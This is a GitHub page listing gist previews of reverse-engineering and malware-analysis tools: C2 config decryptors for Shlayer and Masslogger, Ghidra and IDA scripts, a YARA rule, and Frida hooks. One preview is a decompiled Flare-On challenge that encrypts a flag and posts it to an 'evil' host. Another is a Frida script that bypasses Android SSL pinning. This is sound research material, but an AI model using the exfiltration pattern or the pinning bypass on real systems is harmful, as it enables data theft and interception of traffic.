Skip to content

Instantly share code, notes, and snippets.

View neomafo88's full-sized avatar
🏠
Remote

Neoma Fong neomafo88

🏠
Remote
16 followers · 39 following
View GitHub Profile
@tahaconfiant
tahaconfiant / shlayer_decrypt.py
Created December 23, 2022 15:14
command line script to decrypt OSX/Shlayer.F C2 configuration
# author : [email protected] aka lordx64
# OSX/Shlayer.F C2 config extracting from DMG files
# copyright 2022 - All rights reserved
# compatible python 3.8
# Note on installation on mac:
# brew install gmp
# then: env "CFLAGS=-I/usr/local/include -L/usr/local/lib" pip3 install pycrypto
from Crypto.Cipher import AES
import argparse
@0xca7
0xca7 / gist:696e4e65f72c9aac442340c9d7ef9131
Created December 23, 2022 09:54
highlight and decrypt strings in recordbreaker malware
//TODO recordbreaker string decryption via selection
//Applied to sample: 746669c6be1807fdafbc7ee3f1e958e1b584fa31688742bcc044d269af94b0d8 (sha256)
//@author 0xca7
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
import ghidra.app.script.GhidraScript;
import ghidra.program.model.mem.*;
@notareverser
notareverser / ida-null-bytes.py
Last active March 11, 2025 00:16
IDA Python script to NOP (x86/x64) selected bytes
import idaapi as ia, idc
def PLUGIN_ENTRY(): return nop()
class nop(ia.plugin_t):
flags = ia.PLUGIN_UNL
comment = "NOP"
help = "select bytes, run"
wanted_name = "NOP bytes..."
wanted_hotkey = "Ctrl+Shift+N"
@incogbyte
incogbyte / mixunpin.js
Last active April 21, 2025 03:21
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@Dump-GUY
Dump-GUY / ExtractMassloggerConfig_PowerShell_Reflection.ps1
Last active November 19, 2022 12:04
# Simple show-off using PowerShell and Reflection to extract masslogger config
# Example Sample: https://bazaar.abuse.ch/sample/7187a6d2980e3696396c4fbce939eeeb3733b6afdf2e859a385f8d6b29e8cebc/
# Twitter Info: https://twitter.com/vinopaljiri/status/1593125307468623874
# get the class where config is initialized -> careful, by this we invoked the constructor and all fields are already populated but encrypted
$configClass = [System.Reflection.Assembly]::LoadFile("C:\Users\Inferno\Desktop\test\sample.exe").GetTypes() | ? {$_.Name -like "xmA"}
# class is static so we are not creating instance of it in Invoke
# by invoking this method, config gets decrypted so also its responsible fields (remember reflection Rocks :))
($configClass.GetMethods() | ? {$_.Name -like "Aak"}).Invoke($null, $null) | Out-Null
@extremecoders-re
extremecoders-re / 11.py
Created November 13, 2022 07:51
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.11 (default, Jul 27 2021, 09:42:29) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: <frozen 11>
import crypt, base64, requests
config = {'url':'http://www.evil.flare-on.com', 'flag':b'[email protected]', 'key':b'PyArmor_Pr0tecteth_My_K3y'}
cipher = crypt.ARC4(config['key'])
flag = base64.b64encode(cipher.encrypt(config['flag']))
try:
requests.post((config['url']), data={'flag': flag})
@rroohhh
rroohhh / README.md
Last active November 2, 2022 07:19

We fit a exponential function for $f$: $f(V) = a \exp(V / s)$ and obtain $a \approx 0.02485702\ \mathrm{A}$ and $s \approx 0.229551831\ \mathrm{V}$. With this the deviation from the measured values from the total model $P(V) = 414\ \mathrm{mW} + V · 130 · f(V)$ is always below $8 \ \mathrm{mW}$, indeed it is atmost $\approx 3.19\ \mathrm{mW}$ and on average $\approx 1.28\ \mathrm{mW}$.

When not taking a fixed offset of $414\ \mathrm{mW}$, but instead also leave this as a variable of the fit, we obtain $\approx 412.3\ \mathrm{mW}$ for the offset, $a \approx 0.0249451511\ \mathrm{A}$ and $s \approx 0.229653915\ \mathrm{V}$ with a maximum error of $\approx 2.28\ \mathrm{mW}$ and a average error of $\approx{0.74}\ \mathrm{mW}$.

@xorhex
xorhex / go_macho.yar
Created October 15, 2022 02:47
Look for Go build ID in Macho X86_64 Files
import "macho"
rule is_go_macho {
strings:
$go = { ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 } // \xff Go build ID: \"
condition:
macho.cputype == macho.CPU_TYPE_X86_64
and
for any s in macho.segments : (
@DavidBuchanan314
DavidBuchanan314 / 00_writeup.md
Last active June 21, 2024 08:33

MD5 Collision with CRC32 Preimage

Here's the scenario: We want to craft two different messages with the same MD5 hash, and a specific CRC32 checksum, simultaneously.

In other words, we want an MD5 collision attack and a CRC32 preimage attack.

This might seem like a contrived scenario, but it's exactly the one I faced while producing my PNG hashquine (Yes OK maybe that's also a contrived scenario, cut me some slack).

On its own, a CRC32 preimage attack is trivial. You can craft a 4-byte suffix that gives any message a specific checksum, calculated using a closed-form expression (which I am too lazy to derive, not even with assistance from Z3). It's not an attack per-se, since CRC32 was never meant to be cryptograpically secure in the first place.

@pellaeon
pellaeon / child-gating-poc.py
Created September 23, 2022 12:21
Frida child-gating and spawn-gating example
"""
This POC is based on example from https://frida.re/news/#child-gating
and is aimed to instrument child processes along with the main one.
"""
from __future__ import print_function
import frida
from frida_tools.application import Reactor
import threading